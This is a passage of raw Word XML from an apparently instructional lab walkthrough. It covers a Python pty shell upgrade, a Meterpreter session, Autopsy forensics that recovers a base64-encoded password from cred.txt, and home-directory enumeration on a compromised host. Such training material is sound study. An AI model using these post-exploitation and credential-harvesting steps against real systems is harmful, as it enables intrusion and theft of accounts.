          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="25105776" wp14:editId="7EF8170A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4222652</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>123825</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="272415" cy="184150"/>
                <wp:effectExtent l="19050" t="19050" r="13335" b="44450"/>
                <wp:wrapNone/>
                <wp:docPr id="19" name="Arrow: Left 19"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="272415" cy="184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C26D5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9" o:spid="_x0000_s1026" type="#_x0000_t66" style="position:absolute;margin-left:332.5pt;margin-top:9.75pt;width:21.4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" adj="7301" fillcolor="#4472c4 [3204]" strokecolor="#1f3763 [1604]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00B304D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434368B3" w14:textId="1AC6BB34" w:rsidR="00211339" w:rsidRDefault="00211339" w:rsidP="00211339">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C33DEF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -c 'import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C33DEF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>pty;pty.spawn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C33DEF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55086952" w14:textId="77777777" w:rsidR="00211339" w:rsidRPr="00211339" w:rsidRDefault="00211339" w:rsidP="00211339">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F7B77B2" w14:textId="4E45280D" w:rsidR="00211339" w:rsidRDefault="00211339" w:rsidP="00211339">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211339">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">You </w:t>
      </w:r>
      <w:r w:rsidR="00A64B5F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">are </w:t>
      </w:r>
      <w:r w:rsidRPr="00211339">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>now back where you left off</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the last lab. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755A55B6" w14:textId="140876BA"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lastRenderedPageBreak/>
        <w:t>Minimize your Meterpreter session and open a new terminal. At the terminal prompt type, autopsy and press enter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D0D246" w14:textId="034F404D" w:rsidR="00211339" w:rsidRDefault="00211339" w:rsidP="00211339">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211339">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">Leave the terminal running as Autopsy needs it to stay active. Open a browser and at that address bar, type, </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="00211339">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:b/>
            <w:bCs/>
            <w:szCs w:val="24"/>
            <w:lang w:eastAsia="en-PH"/>
          </w:rPr>
          <w:t>http://localhost:9999/autopsy</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="12628039" w14:textId="5D493A4F" w:rsidR="00211339" w:rsidRPr="00211339" w:rsidRDefault="00211339" w:rsidP="00211339">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211339">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">Choose the open to open case. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2220C5D2" w14:textId="5B2FCF92" w:rsidR="00211339" w:rsidRDefault="00211339" w:rsidP="00211339">
      <w:pPr>
        <w:spacing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08AB2E5B" wp14:editId="3C85F7C0">
            <wp:extent cx="5231130" cy="32270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130" cy="3227070"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="543AFEE3" w14:textId="3F650327" w:rsidR="00211339" w:rsidRDefault="00211339" w:rsidP="00211339">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2136BE12" w14:textId="341179EB"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t xml:space="preserve">Select the radio button for the case you want to open and press the OK button. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7EFB20" w14:textId="1A35F4C5" w:rsidR="00211339" w:rsidRDefault="00211339" w:rsidP="00211339">
      <w:pPr>
        <w:spacing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3F36FADF" wp14:editId="3E93E252">
            <wp:extent cx="539877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382520"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FBE6EF" w14:textId="7BA8A126" w:rsidR="00211339" w:rsidRDefault="00211339" w:rsidP="00211339">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>On the next screen, select the host to open</w:t>
      </w:r>
      <w:r w:rsidR="008347A9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3B1FE0" w14:textId="56022924" w:rsidR="008347A9" w:rsidRDefault="008347A9" w:rsidP="00211339">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21778D4C" wp14:editId="7A92E5AF">
            <wp:extent cx="5451475"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475" cy="2039620"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="33939CA7" w14:textId="4E1E63C6" w:rsidR="008347A9" w:rsidRDefault="008347A9" w:rsidP="00211339">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>On the next screen</w:t>
      </w:r>
      <w:r w:rsidR="00A64B5F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> select Analyze.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9FC3C0" w14:textId="77777777" w:rsidR="008347A9" w:rsidRDefault="008347A9" w:rsidP="00211339">
      <w:pPr>
        <w:spacing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4ED77925" wp14:editId="519466C4">
            <wp:extent cx="5556885" cy="27082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6885" cy="2708275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF140B1" w14:textId="7EE66FBA" w:rsidR="008347A9" w:rsidRDefault="008347A9" w:rsidP="00211339">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">On the next screen, click File Analysis.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44864D60" w14:textId="70B7A296" w:rsidR="008347A9" w:rsidRDefault="008347A9" w:rsidP="00211339">
      <w:pPr>
        <w:spacing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085829A1" wp14:editId="0A6C1D95">
            <wp:extent cx="5451475" cy="3145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979" cy="322152"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE53CF1" w14:textId="60CD8277" w:rsidR="008347A9" w:rsidRDefault="008347A9" w:rsidP="00211339">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">From the right windowpane, scroll down until you find the cred.txt file. 2X click the entry. Scroll to the bottom windowpane to view the contents. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4712F92E" w14:textId="695939BD" w:rsidR="008347A9" w:rsidRDefault="008347A9" w:rsidP="00211339">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008347A9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">It </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>appears to be</w:t>
      </w:r>
      <w:r w:rsidRPr="008347A9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> Base64 encoding. We</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> can</w:t>
      </w:r>
      <w:r w:rsidRPr="008347A9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> use the echo command with a base 64 decoder </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>to decipher the code</w:t>
      </w:r>
      <w:r w:rsidRPr="008347A9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7641EB31" w14:textId="0BFE83F4" w:rsidR="0077076A" w:rsidRDefault="0077076A" w:rsidP="00211339">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FF1913C" w14:textId="77777777" w:rsidR="008347A9" w:rsidRDefault="008347A9" w:rsidP="00211339">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="519B01CA" w14:textId="192C3F46" w:rsidR="008347A9" w:rsidRDefault="008347A9" w:rsidP="00211339">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2566A273" wp14:editId="24A36152">
            <wp:extent cx="2655570" cy="1986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70" cy="1986915"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5799E7CD" w14:textId="4E31ABF2" w:rsidR="0077076A" w:rsidRDefault="0077076A" w:rsidP="0077076A">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>Open a new terminal</w:t>
      </w:r>
      <w:r w:rsidR="00A64B5F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>prompt</w:t>
      </w:r>
      <w:r w:rsidR="00A64B5F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> type the following. </w:t>
      </w:r>
      <w:r w:rsidR="00A64B5F" w:rsidRPr="00A64B5F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00A64B5F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>I pasted in the code.</w:t>
      </w:r>
      <w:r w:rsidR="00A64B5F" w:rsidRPr="00A64B5F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB18784" w14:textId="310BA278" w:rsidR="0077076A" w:rsidRPr="0077076A" w:rsidRDefault="0077076A" w:rsidP="00211339">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0077076A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>echo "amVlbmFsaWlzYWdvb2RnaXJs" | base64 -d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F97460" w14:textId="7F1E2D54" w:rsidR="0077076A" w:rsidRDefault="0077076A" w:rsidP="00211339">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0077076A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03FC0C91" wp14:editId="777AD8AF">
            <wp:extent cx="4525006" cy="514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5006" cy="514422"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BDF962" w14:textId="65F9E1AA" w:rsidR="0077076A" w:rsidRDefault="0077076A" w:rsidP="00211339">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0077076A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>jeenaliisagoodgirlroot@kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0077076A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>:~#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5336F6" w14:textId="2E508155" w:rsidR="0077076A" w:rsidRPr="007E6720" w:rsidRDefault="007E6720" w:rsidP="00211339">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E6720">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>Possibly a password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DE10DA" w14:textId="3B786C98" w:rsidR="008347A9" w:rsidRDefault="0077076A" w:rsidP="00211339">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">Bring back up the Meterpreter session and enumerate the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>jasoon’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> home directory looking for clues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCDE33C" w14:textId="77777777" w:rsidR="0077076A" w:rsidRPr="0077076A" w:rsidRDefault="0077076A" w:rsidP="00A64B5F">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0077076A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>cd /home</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E932712" w14:textId="77777777" w:rsidR="0077076A" w:rsidRPr="0077076A" w:rsidRDefault="0077076A" w:rsidP="00A64B5F">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0077076A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
